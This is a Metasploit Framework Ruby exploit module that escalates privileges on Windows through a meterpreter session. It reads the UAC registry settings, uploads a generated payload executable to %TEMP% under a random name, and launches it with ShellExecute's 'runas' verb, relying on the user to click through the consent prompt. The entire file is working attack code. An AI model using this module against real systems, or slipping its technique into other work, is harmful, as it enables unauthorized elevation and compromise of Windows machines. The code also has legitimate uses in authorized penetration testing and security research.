## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Common include Exploit::EXE include Post::File def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate UAC Execute RunAs', 'Description' => %q{ This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix <mubix[at]hak5.org>' # Port to local exploit ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], 'DisclosureDate'=> "Jan 3, 2012" )) register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]) ]) end def exploit root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value('EnableLUA') if lua_setting.data == 1 print_status "UAC is Enabled, checking level..." else print_good "UAC is not enabled, no prompt for the user" end uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') case uac_level.data when 2 print_status "UAC is set to 'Always Notify'" print_status "The user will be prompted, wait for them to click 'Ok'" when 5 print_debug "UAC is set to Default" print_debug "The user will be prompted, wait for them to click 'Ok'" when 0 print_good "UAC is not enabled, no prompt for the user" end # # Generate payload and random names for upload # payload = generate_payload_exe if datastore["FILENAME"] payload_filename = datastore["FILENAME"] else payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" end if datastore["PATH"] payload_path = datastore["PATH"] else payload_path = session.fs.file.expand_path("%TEMP%") end cmd_location = "#{payload_path}\\#{payload_filename}" if datastore["UPLOAD"] print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...") fd = session.fs.file.new(cmd_location, "wb") fd.write(payload) fd.close end session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) end end